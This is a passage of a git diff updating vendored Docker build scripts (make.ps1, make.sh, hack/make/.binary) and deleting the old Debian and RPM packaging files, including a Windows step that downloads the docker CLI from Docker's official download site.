     # Give a warning if we are not running in a container and are building binaries or running unit tests.
     # Not relevant for validation tests as these are fine to run outside of a container.
-    if ($Client -or $Daemon -or $TestUnit) { Check-InContainer }
+    if ($Client -or $Daemon -or $TestUnit) { $inContainer=Check-InContainer }
+
+    # If we are not in a container, validate the version of GO that is installed.
+    if (-not $inContainer) { Verify-GoVersion }
 
     # Verify GOPATH is set
     if ($env:GOPATH.Length -eq 0) { Throw "Missing GOPATH environment variable. See https://golang.org/doc/code.html#GOPATH" }
@@ -342,7 +365,7 @@ Try {
     # Run autogen if building binaries or running unit tests.
     if ($Client -or $Daemon -or $TestUnit) {
         Write-Host "INFO: Invoking autogen..."
-        Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion }
+        Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion -Platform "$env:PLATFORM" }
         Catch [Exception] { Throw $_ }
     }
 
@@ -369,7 +392,32 @@ Try {
 
         # Perform the actual build
         if ($Daemon) { Execute-Build "daemon" "daemon" "dockerd" }
-        if ($Client) { Execute-Build "client" "" "docker" }
+        if ($Client) {
+            # Get the Docker channel and version from the environment, or use the defaults.
+            if (-not ($channel = $env:DOCKERCLI_CHANNEL)) { $channel = "edge" }
+            if (-not ($version = $env:DOCKERCLI_VERSION)) { $version = "17.06.0-ce" }
+
+            # Download the zip file and extract the client executable.
+            Write-Host "INFO: Downloading docker/cli version $version from $channel..."
+            $url = "https://download.docker.com/win/static/$channel/x86_64/docker-$version.zip"
+            Invoke-WebRequest $url -OutFile "docker.zip"
+            Try {
+                Add-Type -AssemblyName System.IO.Compression.FileSystem
+                $zip = [System.IO.Compression.ZipFile]::OpenRead("$PWD\docker.zip")
+                Try {
+                    if (-not ($entry = $zip.Entries | Where-Object { $_.Name -eq "docker.exe" })) {
+                        Throw "Cannot find docker.exe in $url"
+                    }
+                    [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, "$PWD\bundles\docker.exe", $true)
+                }
+                Finally {
+                    $zip.Dispose()
+                }
+            }
+            Finally {
+                Remove-Item -Force "docker.zip"
+            }
+        }
     }
 
     # Run unit tests
@@ -403,6 +451,7 @@ Catch [Exception] {
     Throw $_
 }
 Finally {
+    Pop-Location # As we pushed to the root of the repo as the very first thing
     if ($global:pushed) { Pop-Location }
     Write-Host -ForegroundColor Cyan "INFO: make.ps1 ended at $(Get-Date)"
 }
diff --git a/vendor/github.com/docker/docker/hack/make.sh b/vendor/github.com/docker/docker/hack/make.sh
index f0e482feda..cd9232a4a5 100755
--- a/vendor/github.com/docker/docker/hack/make.sh
+++ b/vendor/github.com/docker/docker/hack/make.sh
@@ -36,7 +36,7 @@ if [ "$(go env GOHOSTOS)" = 'windows' ]; then
 		unset inContainer
 	fi
 else
-	if [ "$PWD" != "/go/src/$DOCKER_PKG" ] || [ -z "$DOCKER_CROSSPLATFORMS" ]; then
+	if [ "$PWD" != "/go/src/$DOCKER_PKG" ]; then
 		unset inContainer
 	fi
 fi
@@ -56,21 +56,20 @@ echo
 
 # List of bundles to create when no argument is passed
 DEFAULT_BUNDLES=(
-	binary-client
 	binary-daemon
 	dynbinary
 
-	test-unit
-	test-integration-cli
+	test-integration
 	test-docker-py
 
 	cross
-	tgz
 )
 
-VERSION=$(< ./VERSION)
-! BUILDTIME=$(date --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/')
-if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; then
+VERSION=${VERSION:-dev}
+! BUILDTIME=$(date -u -d "@${SOURCE_DATE_EPOCH:-$(date +%s)}" --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/')
+if [ "$DOCKER_GITCOMMIT" ]; then
+	GITCOMMIT="$DOCKER_GITCOMMIT"
+elif command -v git &> /dev/null && [ -e .git ] && git rev-parse &> /dev/null; then
 	GITCOMMIT=$(git rev-parse --short HEAD)
 	if [ -n "$(git status --porcelain --untracked-files=no)" ]; then
 		GITCOMMIT="$GITCOMMIT-unsupported"
@@ -83,8 +82,6 @@ if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; the
 		git status --porcelain --untracked-files=no
 		echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
 	fi
-elif [ "$DOCKER_GITCOMMIT" ]; then
-	GITCOMMIT="$DOCKER_GITCOMMIT"
 else
 	echo >&2 'error: .git directory missing and DOCKER_GITCOMMIT not specified'
 	echo >&2 '  Please either build with the .git directory accessible, or specify the'
@@ -98,13 +95,6 @@ if [ "$AUTO_GOPATH" ]; then
 	mkdir -p .gopath/src/"$(dirname "${DOCKER_PKG}")"
 	ln -sf ../../../.. .gopath/src/"${DOCKER_PKG}"
 	export GOPATH="${PWD}/.gopath"
-
-	if [ "$(go env GOOS)" = 'solaris' ]; then
-		# sys/unix is installed outside the standard library on solaris
-		# TODO need to allow for version change, need to get version from go
-		export GO_VERSION=${GO_VERSION:-"1.7.1"}
-		export GOPATH="${GOPATH}:/usr/lib/gocode/${GO_VERSION}"
-	fi
 fi
 
 if [ ! "$GOPATH" ]; then
@@ -113,7 +103,12 @@ if [ ! "$GOPATH" ]; then
 	exit 1
 fi
 
-DOCKER_BUILDTAGS+=" daemon"
+# Adds $1_$2 to DOCKER_BUILDTAGS unless it already
+# contains a word starting from $1_
+add_buildtag() {
+	[[ " $DOCKER_BUILDTAGS" == *" $1_"* ]] || DOCKER_BUILDTAGS+=" $1_$2"
+}
+
 if ${PKG_CONFIG} 'libsystemd >= 209' 2> /dev/null ; then
 	DOCKER_BUILDTAGS+=" journald"
 elif ${PKG_CONFIG} 'libsystemd-journal' 2> /dev/null ; then
@@ -129,18 +124,19 @@ if \
 fi
 
 # test whether "libdevmapper.h" is new enough to support deferred remove
-# functionality.
+# functionality. We favour libdm_dlsym_deferred_remove over
+# libdm_no_deferred_remove in dynamic cases because the binary could be shipped
+# with a newer libdevmapper than the one it was built wih.
 if \
 	command -v gcc &> /dev/null \
-	&& ! ( echo -e  '#include <libdevmapper.h>\nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null -ldevmapper &> /dev/null ) \
+	&& ! ( echo -e  '#include <libdevmapper.h>\nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null $(pkg-config --libs devmapper) &> /dev/null ) \
 ; then
-       DOCKER_BUILDTAGS+=' libdm_no_deferred_remove'
+	add_buildtag libdm dlsym_deferred_remove
 fi
 
 # Use these flags when compiling the tests and final binary
 
 IAMSTATIC='true'
-source "$SCRIPTDIR/make/.go-autogen"
 if [ -z "$DOCKER_DEBUG" ]; then
 	LDFLAGS='-w'
 fi
@@ -149,21 +145,21 @@ LDFLAGS_STATIC=''
 EXTLDFLAGS_STATIC='-static'
 # ORIG_BUILDFLAGS is necessary for the cross target which cannot always build
 # with options like -race.
-ORIG_BUILDFLAGS=( -tags "autogen netgo static_build sqlite_omit_load_extension $DOCKER_BUILDTAGS" -installsuffix netgo )
+ORIG_BUILDFLAGS=( -tags "autogen netgo static_build $DOCKER_BUILDTAGS" -installsuffix netgo )
 # see https://github.com/golang/go/issues/9369#issuecomment-69864440 for why -installsuffix is necessary here
 
 # When $DOCKER_INCREMENTAL_BINARY is set in the environment, enable incremental
 # builds by installing dependent packages to the GOPATH.
 REBUILD_FLAG="-a"
-if [ "$DOCKER_INCREMENTAL_BINARY" ]; then
+if [ "$DOCKER_INCREMENTAL_BINARY" == "1" ] || [ "$DOCKER_INCREMENTAL_BINARY" == "true" ]; then
 	REBUILD_FLAG="-i"
 fi
 ORIG_BUILDFLAGS+=( $REBUILD_FLAG )
 
 BUILDFLAGS=( $BUILDFLAGS "${ORIG_BUILDFLAGS[@]}" )
-# Test timeout.
 
-if [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then
+# Test timeout.
+if [ "${DOCKER_ENGINE_GOARCH}" == "arm64" ] || [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then
 	: ${TIMEOUT:=10m}
 elif [ "${DOCKER_ENGINE_GOARCH}" == "windows" ]; then
 	: ${TIMEOUT:=8m}
@@ -186,101 +182,25 @@ if [ "$(uname -s)" = 'FreeBSD' ]; then
 	LDFLAGS="$LDFLAGS -extld clang"
 fi
 
-# If sqlite3.h doesn't exist under /usr/include,
-# check /usr/local/include also just in case
-# (e.g. FreeBSD Ports installs it under the directory)
-if [ ! -e /usr/include/sqlite3.h ] && [ -e /usr/local/include/sqlite3.h ]; then
-	export CGO_CFLAGS='-I/usr/local/include'
-	export CGO_LDFLAGS='-L/usr/local/lib'
-fi
-
-HAVE_GO_TEST_COVER=
-if \
-	go help testflag | grep -- -cover > /dev/null \
-	&& go tool -n cover > /dev/null 2>&1 \
-; then
-	HAVE_GO_TEST_COVER=1
-fi
-
-# a helper to provide ".exe" when it's appropriate
-binary_extension() {
-	if [ "$(go env GOOS)" = 'windows' ]; then
-		echo -n '.exe'
-	fi
-}
-
-hash_files() {
-	while [ $# -gt 0 ]; do
-		f="$1"
-		shift
-		dir="$(dirname "$f")"
-		base="$(basename "$f")"
-		for hashAlgo in md5 sha256; do
-			if command -v "${hashAlgo}sum" &> /dev/null; then
-				(
-					# subshell and cd so that we get output files like:
-					#   $HASH docker-$VERSION
-					# instead of:
-					#   $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION
-					cd "$dir"
-					"${hashAlgo}sum" "$base" > "$base.$hashAlgo"
-				)
-			fi
-		done
-	done
-}
-
 bundle() {
 	local bundle="$1"; shift
 	echo "---> Making bundle: $(basename "$bundle") (in $DEST)"
 	source "$SCRIPTDIR/make/$bundle" "$@"
 }
 
-copy_binaries() {
-	dir="$1"
-	# Add nested executables to bundle dir so we have complete set of
-	# them available, but only if the native OS/ARCH is the same as the
-	# OS/ARCH of the build target
-	if [ "$(go env GOOS)/$(go env GOARCH)" == "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then
-		if [ -x /usr/local/bin/docker-runc ]; then
-			echo "Copying nested executables into $dir"
-			for file in containerd containerd-shim containerd-ctr runc init proxy; do
-				cp `which "docker-$file"` "$dir/"
-				if [ "$2" == "hash" ]; then
-					hash_files "$dir/docker-$file"
-				fi
-			done
-		fi
-	fi
-}
-
-install_binary() {
-	file="$1"
-	target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/"
-	if [ "$(go env GOOS)" == "linux" ]; then
-		echo "Installing $(basename $file) to ${target}"
-		cp -L "$file" "$target"
-	else
-		echo "Install is only supported on linux"
-		return 1
-	fi
-}
-
 main() {
-	# We want this to fail if the bundles already exist and cannot be removed.
-	# This is to avoid mixing bundles from different versions of the code.
-	mkdir -p bundles
-	if [ -e "bundles/$VERSION" ] && [ -z "$KEEPBUNDLE" ]; then
-		echo "bundles/$VERSION already exists. Removing."
-		rm -fr "bundles/$VERSION" && mkdir "bundles/$VERSION" || exit 1
+	if [ -z "${KEEPBUNDLE-}" ]; then
+		echo "Removing bundles/"
+		rm -rf "bundles/*"
 		echo
 	fi
+	mkdir -p bundles
 
+	# Windows and symlinks don't get along well
 	if [ "$(go env GOHOSTOS)" != 'windows' ]; then
-		# Windows and symlinks don't get along well
-
 		rm -f bundles/latest
-		ln -s "$VERSION" bundles/latest
+		# preserve latest symlink for backward compatibility
+		ln -sf . bundles/latest
 	fi
 
 	if [ $# -lt 1 ]; then
@@ -289,7 +209,7 @@ main() {
 		bundles=($@)
 	fi
 	for bundle in ${bundles[@]}; do
-		export DEST="bundles/$VERSION/$(basename "$bundle")"
+		export DEST="bundles/$(basename "$bundle")"
 		# Cygdrive paths don't play well with go build -o.
 		if [[ "$(uname -s)" == CYGWIN* ]]; then
 			export DEST="$(cygpath -mw "$DEST")"
diff --git a/vendor/github.com/docker/docker/hack/make/.binary b/vendor/github.com/docker/docker/hack/make/.binary
index f5c35c3b7e..9375926d6b 100644
--- a/vendor/github.com/docker/docker/hack/make/.binary
+++ b/vendor/github.com/docker/docker/hack/make/.binary
@@ -1,12 +1,42 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
+# a helper to provide ".exe" when it's appropriate
+binary_extension() {
+	if [ "$(go env GOOS)" = 'windows' ]; then
+		echo -n '.exe'
+	fi
+}
+
+GO_PACKAGE='github.com/docker/docker/cmd/dockerd'
+BINARY_SHORT_NAME='dockerd'
 BINARY_NAME="$BINARY_SHORT_NAME-$VERSION"
 BINARY_EXTENSION="$(binary_extension)"
 BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION"
 
 source "${MAKEDIR}/.go-autogen"
 
+hash_files() {
+	while [ $# -gt 0 ]; do
+		f="$1"
+		shift
+		dir="$(dirname "$f")"
+		base="$(basename "$f")"
+		for hashAlgo in md5 sha256; do
+			if command -v "${hashAlgo}sum" &> /dev/null; then
+				(
+					# subshell and cd so that we get output files like:
+					#   $HASH docker-$VERSION
+					# instead of:
+					#   $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION
+					cd "$dir"
+					"${hashAlgo}sum" "$base" > "$base.$hashAlgo"
+				)
+			fi
+		done
+	done
+}
+
 (
 export GOGC=${DOCKER_BUILD_GOGC:-1000}
 
@@ -20,15 +50,9 @@ if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARC
 	esac
 fi
 
-if [ "$IAMSTATIC" == "true" ] && [ "$(go env GOHOSTOS)" == "linux" ]; then
-	if  [ "${GOOS}/${GOARCH}" == "darwin/amd64" ]; then
-		export CGO_ENABLED=1
-		export CC=o64-clang
-		export LDFLAGS='-linkmode external -s'
-		export LDFLAGS_STATIC_DOCKER='-extld='${CC}
-	else
-		export BUILDFLAGS=( "${BUILDFLAGS[@]/pkcs11 /}" ) # we cannot dlopen in pkcs11 in a static binary
-	fi
+# -buildmode=pie is not supported on Windows.
+if [ "$(go env GOOS)" != "windows" ]; then
+	BUILDFLAGS+=( "-buildmode=pie" )
 fi
 
 echo "Building: $DEST/$BINARY_FULLNAME"
@@ -38,6 +62,7 @@ go build \
 	-ldflags "
 		$LDFLAGS
 		$LDFLAGS_STATIC_DOCKER
+		$DOCKER_LDFLAGS
 	" \
 	$GO_PACKAGE
 )
diff --git a/vendor/github.com/docker/docker/hack/make/.binary-setup b/vendor/github.com/docker/docker/hack/make/.binary-setup
index b9f8ce2517..15de89fe10 100644
--- a/vendor/github.com/docker/docker/hack/make/.binary-setup
+++ b/vendor/github.com/docker/docker/hack/make/.binary-setup
@@ -1,6 +1,5 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
-DOCKER_CLIENT_BINARY_NAME='docker'
 DOCKER_DAEMON_BINARY_NAME='dockerd'
 DOCKER_RUNC_BINARY_NAME='docker-runc'
 DOCKER_CONTAINERD_BINARY_NAME='docker-containerd'
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/compat b/vendor/github.com/docker/docker/hack/make/.build-deb/compat
deleted file mode 100644
index ec635144f6..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/compat
+++ /dev/null
@@ -1 +0,0 @@
-9
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/control b/vendor/github.com/docker/docker/hack/make/.build-deb/control
deleted file mode 100644
index 0f5439947c..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/control
+++ /dev/null
@@ -1,29 +0,0 @@
-Source: docker-engine
-Section: admin
-Priority: optional
-Maintainer: Docker <support@docker.com>
-Standards-Version: 3.9.6
-Homepage: https://dockerproject.org
-Vcs-Browser: https://github.com/docker/docker
-Vcs-Git: git://github.com/docker/docker.git
-
-Package: docker-engine
-Architecture: linux-any
-Depends: iptables, ${misc:Depends}, ${perl:Depends}, ${shlibs:Depends}
-Recommends: aufs-tools,
-            ca-certificates,
-            cgroupfs-mount | cgroup-lite,
-            git,
-            xz-utils,
-            ${apparmor:Recommends}
-Conflicts: docker (<< 1.5~), docker.io, lxc-docker, lxc-docker-virtual-package, docker-engine-cs
-Description: Docker: the open-source application container engine
- Docker is an open source project to build, ship and run any application as a
- lightweight container
- .
- Docker containers are both hardware-agnostic and platform-agnostic. This means
- they can run anywhere, from your laptop to the largest EC2 compute instance and
- everything in between - and they don't require you to use a particular
- language, framework or packaging system. That makes them great building blocks
- for deploying and scaling web apps, databases, and backend services without
- depending on a particular stack or provider.
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion
deleted file mode 100644
index 6ea1119308..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion
+++ /dev/null
@@ -1 +0,0 @@
-contrib/completion/bash/docker
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default
deleted file mode 120000
index 4278533d65..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default
+++ /dev/null
@@ -1 +0,0 @@
-../../../contrib/init/sysvinit-debian/docker.default
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init
deleted file mode 120000
index 8cb89d30dd..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init
+++ /dev/null
@@ -1 +0,0 @@
-../../../contrib/init/sysvinit-debian/docker
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart
deleted file mode 120000
index 7e1b64a3e6..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart
+++ /dev/null
@@ -1 +0,0 @@
-../../../contrib/init/upstart/docker.conf
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install
deleted file mode 100644
index dc6b25f04f..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install
+++ /dev/null
@@ -1,12 +0,0 @@
-#contrib/syntax/vim/doc/* /usr/share/vim/vimfiles/doc/
-#contrib/syntax/vim/ftdetect/* /usr/share/vim/vimfiles/ftdetect/
-#contrib/syntax/vim/syntax/* /usr/share/vim/vimfiles/syntax/
-contrib/*-integration usr/share/docker-engine/contrib/
-contrib/check-config.sh usr/share/docker-engine/contrib/
-contrib/completion/fish/docker.fish usr/share/fish/vendor_completions.d/
-contrib/completion/zsh/_docker usr/share/zsh/vendor-completions/
-contrib/init/systemd/docker.service lib/systemd/system/
-contrib/init/systemd/docker.socket lib/systemd/system/
-contrib/mk* usr/share/docker-engine/contrib/
-contrib/nuke-graph-directory.sh usr/share/docker-engine/contrib/
-contrib/syntax/nano/Dockerfile.nanorc usr/share/nano/
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages
deleted file mode 100644
index 1aa62186a6..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages
+++ /dev/null
@@ -1 +0,0 @@
-man/man*/*
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst
deleted file mode 100644
index eeef6ca801..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/sh
-set -e
-
-case "$1" in
-	configure)
-		if [ -z "$2" ]; then
-			if ! getent group docker > /dev/null; then
-				groupadd --system docker
-			fi
-		fi
-		;;
-	abort-*)
-		# How'd we get here??
-		exit 1
-		;;
-	*)
-		;;
-esac
-
-#DEBHELPER#
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev
deleted file mode 120000
index 914a361959..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev
+++ /dev/null
@@ -1 +0,0 @@
-../../../contrib/udev/80-docker.rules
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docs b/vendor/github.com/docker/docker/hack/make/.build-deb/docs
deleted file mode 100644
index b43bf86b50..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/docs
+++ /dev/null
@@ -1 +0,0 @@
-README.md
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/rules b/vendor/github.com/docker/docker/hack/make/.build-deb/rules
deleted file mode 100755
index 6522103e5d..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-deb/rules
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/usr/bin/make -f
-
-VERSION = $(shell cat VERSION)
-SYSTEMD_VERSION := $(shell dpkg-query -W -f='$${Version}\n' systemd | cut -d- -f1)
-SYSTEMD_GT_227 := $(shell [ '$(SYSTEMD_VERSION)' ] && [ '$(SYSTEMD_VERSION)' -gt 227 ] && echo true )
-
-override_dh_gencontrol:
-	# if we're on Ubuntu, we need to Recommends: apparmor
-	echo 'apparmor:Recommends=$(shell dpkg-vendor --is Ubuntu && echo apparmor)' >> debian/docker-engine.substvars
-	dh_gencontrol
-
-override_dh_auto_build:
-	./hack/make.sh dynbinary
-	# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here
-
-override_dh_auto_test:
-	./bundles/$(VERSION)/dynbinary-daemon/dockerd -v
-	./bundles/$(VERSION)/dynbinary-client/docker -v
-
-override_dh_strip:
-	# Go has lots of problems with stripping, so just don't
-
-override_dh_auto_install:
-	mkdir -p debian/docker-engine/usr/bin
-	cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-client/docker)" debian/docker-engine/usr/bin/docker
-	cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-daemon/dockerd)" debian/docker-engine/usr/bin/dockerd
-	cp -aT /usr/local/bin/docker-proxy debian/docker-engine/usr/bin/docker-proxy
-	cp -aT /usr/local/bin/docker-containerd debian/docker-engine/usr/bin/docker-containerd
-	cp -aT /usr/local/bin/docker-containerd-shim debian/docker-engine/usr/bin/docker-containerd-shim
-	cp -aT /usr/local/bin/docker-containerd-ctr debian/docker-engine/usr/bin/docker-containerd-ctr
-	cp -aT /usr/local/bin/docker-runc debian/docker-engine/usr/bin/docker-runc
-	cp -aT /usr/local/bin/docker-init debian/docker-engine/usr/bin/docker-init
-	mkdir -p debian/docker-engine/usr/lib/docker
-
-override_dh_installinit:
-	# use "docker" as our service name, not "docker-engine"
-	dh_installinit --name=docker
-ifeq (true, $(SYSTEMD_GT_227))
-	$(warning "Setting TasksMax=infinity")
-	sed -i -- 's/#TasksMax=infinity/TasksMax=infinity/' debian/docker-engine/lib/systemd/system/docker.service
-endif
-
-override_dh_installudev:
-	# match our existing priority
-	dh_installudev --priority=z80
-
-override_dh_install:
-	dh_install
-	dh_apparmor --profile-name=docker-engine -pdocker-engine
-
-override_dh_shlibdeps:
-	dh_shlibdeps --dpkg-shlibdeps-params=--ignore-missing-info
-
-%:
-	dh $@ --with=bash-completion $(shell command -v dh_systemd_enable > /dev/null 2>&1 && echo --with=systemd)
diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec
deleted file mode 100644
index ae597bd774..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec
+++ /dev/null
@@ -1,96 +0,0 @@
-# Some bits borrowed from the openstack-selinux package
-Name: docker-engine-selinux
-Version: %{_version}
-Release: %{_release}%{?dist}
-Summary: SELinux Policies for the open-source application container engine
-BuildArch: noarch
-Group: Tools/Docker
-
-License: GPLv2
-Source: %{name}.tar.gz
-
-URL: https://dockerproject.org
-Vendor: Docker
-Packager: Docker <support@docker.com>
-
-%global selinux_policyver 3.13.1-102
-%global selinuxtype targeted
-%global moduletype  services
-%global modulenames docker
-
-Requires(post): selinux-policy-base >= %{selinux_policyver}, selinux-policy-targeted >= %{selinux_policyver}, policycoreutils, policycoreutils-python libselinux-utils
-BuildRequires: selinux-policy selinux-policy-devel
-
-# conflicting packages
-Conflicts: docker-selinux
-
-# Usage: _format var format
-#   Expand 'modulenames' into various formats as needed
-#   Format must contain '$x' somewhere to do anything useful
-%global _format() export %1=""; for x in %{modulenames}; do %1+=%2; %1+=" "; done;
-
-# Relabel files
-%global relabel_files() \
-    /sbin/restorecon -R %{_bindir}/docker %{_localstatedir}/run/docker.sock %{_localstatedir}/run/docker.pid %{_sysconfdir}/docker %{_localstatedir}/log/docker %{_localstatedir}/log/lxc %{_localstatedir}/lock/lxc %{_usr}/lib/systemd/system/docker.service /root/.docker &> /dev/null || : \
-
-%description
-SELinux policy modules for use with Docker
-
-%prep
-%if 0%{?centos} <= 6
-%setup -n %{name}
-%else
-%autosetup -n %{name}
-%endif
-
-%build
-make SHARE="%{_datadir}" TARGETS="%{modulenames}"
-
-%install
-
-# Install SELinux interfaces
-%_format INTERFACES $x.if
-install -d %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype}
-install -p -m 644 $INTERFACES %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype}
-
-# Install policy modules
-%_format MODULES $x.pp.bz2
-install -d %{buildroot}%{_datadir}/selinux/packages
-install -m 0644 $MODULES %{buildroot}%{_datadir}/selinux/packages
-
-%post
-#
-# Install all modules in a single transaction
-#
-if [ $1 -eq 1 ]; then
-    %{_sbindir}/setsebool -P -N virt_use_nfs=1 virt_sandbox_use_all_caps=1
-fi
-%_format MODULES %{_datadir}/selinux/packages/$x.pp.bz2
-%{_sbindir}/semodule -n -s %{selinuxtype} -i $MODULES
-if %{_sbindir}/selinuxenabled ; then
-    %{_sbindir}/load_policy
-    %relabel_files
-    if [ $1 -eq 1 ]; then
-      restorecon -R %{_sharedstatedir}/docker
-    fi
-fi
-
-%postun
-if [ $1 -eq 0 ]; then
-    %{_sbindir}/semodule -n -r %{modulenames} &> /dev/null || :
-    if %{_sbindir}/selinuxenabled ; then
-        %{_sbindir}/load_policy
-        %relabel_files
-    fi
-fi
-
-%files
-%doc LICENSE
-%defattr(-,root,root,0755)
-%attr(0644,root,root) %{_datadir}/selinux/packages/*.pp.bz2
-%attr(0644,root,root) %{_datadir}/selinux/devel/include/%{moduletype}/*.if
-
-%changelog
-* Tue Dec 1 2015 Jessica Frazelle <acidburn@docker.com> 1.9.1-1
-- add licence to rpm
-- add selinux-policy and docker-engine-selinux rpm
diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec
deleted file mode 100644
index d53e55b6c9..0000000000
--- a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec
+++ /dev/null
@@ -1,254 +0,0 @@
-Name: docker-engine
-Version: %{_version}
-Release: %{_release}%{?dist}
-Summary: The open-source application container engine
-Group: Tools/Docker
-
-License: ASL 2.0
-Source: %{name}.tar.gz
-
-URL: https://dockerproject.org
-Vendor: Docker
-Packager: Docker <support@docker.com>
-
-# is_systemd conditional
-%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?suse_version} >= 1210
-%global is_systemd 1
-%endif
-
-# required packages for build
-# most are already in the container (see contrib/builder/rpm/ARCH/generate.sh)
-# only require systemd on those systems
-%if 0%{?is_systemd}
-%if 0%{?suse_version} >= 1210
-BuildRequires: systemd-rpm-macros
-%{?systemd_requires}
-%else
-%if 0%{?fedora} >= 25
-# Systemd 230 and up no longer have libsystemd-journal (see https://bugzilla.redhat.com/show_bug.cgi?id=1350301)
-BuildRequires: pkgconfig(systemd)
-Requires: systemd-units
-%else
-BuildRequires: pkgconfig(systemd)
-Requires: systemd-units
-BuildRequires: pkgconfig(libsystemd-journal)
-%endif
-%endif
-%else
-Requires(post): chkconfig
-Requires(preun): chkconfig
-# This is for /sbin/service
-Requires(preun): initscripts
-%endif
-
-# required packages on install
-Requires: /bin/sh
-Requires: iptables
-%if !0%{?suse_version}
-Requires: libcgroup
-%else
-Requires: libcgroup1
-%endif
-Requires: tar
-Requires: xz
-%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
-# Resolves: rhbz#1165615
-Requires: device-mapper-libs >= 1.02.90-1
-%endif
-%if 0%{?oraclelinux} >= 6
-# Require Oracle Unbreakable Enterprise Kernel R4 and newer device-mapper
-Requires: kernel-uek >= 4.1
-Requires: device-mapper >= 1.02.90-2
-%endif
-
-# docker-selinux conditional
-%if 0%{?fedora} >= 20 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
-%global with_selinux 1
-%endif
-
-# DWZ problem with multiple golang binary, see bug
-# https://bugzilla.redhat.com/show_bug.cgi?id=995136#c12
-%if 0%{?fedora} >= 20 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
-%global _dwz_low_mem_die_limit 0
-%endif
-
-# start if with_selinux
-%if 0%{?with_selinux}
-# Version of SELinux we were using
-%if 0%{?fedora} == 20
-%global selinux_policyver 3.12.1-197
-%endif # fedora 20
-%if 0%{?fedora} == 21
-%global selinux_policyver 3.13.1-105
-%endif # fedora 21
-%if 0%{?fedora} >= 22
-%global selinux_policyver 3.13.1-128
-%endif # fedora 22
-%if 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
-%global selinux_policyver 3.13.1-23
